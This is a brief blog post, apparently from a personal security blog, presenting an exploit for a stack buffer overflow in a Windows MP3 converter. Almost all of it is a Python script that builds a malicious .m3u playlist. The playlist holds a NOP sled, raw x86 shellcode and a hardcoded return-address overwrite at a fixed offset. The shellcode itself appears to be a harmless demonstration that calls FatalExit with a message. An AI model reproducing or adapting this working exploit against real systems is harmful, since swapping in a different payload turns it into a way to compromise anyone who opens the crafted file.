Easy RM Convert MP3 Exploit (Hack/Windows) 2016. 6. 14. 02:18
This one was extremely easy. Only the other DLLs have mitigations; the exe itself has none, so exploitation was really straightforward.
If there is a downside, it is that the jmp esp gadget in the DLL cannot be used (ASLR).
import struct

# Pack a 32-bit little-endian address (unpack helper kept from the original script)
p = lambda x: struct.pack("<L", x)
up = lambda x: struct.unpack("<L", x)

# Shellcode as given in the post (raw bytes, so it is written out unchanged)
shellcode = b"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x21\x21\x01\x68\x67\x73\x61\x72\x68\x20\x73\x30\x6e\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"

# Defined in the original script but not used by the payload below
jmpesp = 0x385f23a

payload = b"\x90" * 20000                    # NOP sled
payload += shellcode
payload += b"\x90" * (26086 - len(payload))  # pad up to the saved return address
payload += p(0x15a434)                       # return address overwrite

# Write the crafted playlist the player will open
with open("test.m3u", "wb") as f:
    f.write(payload)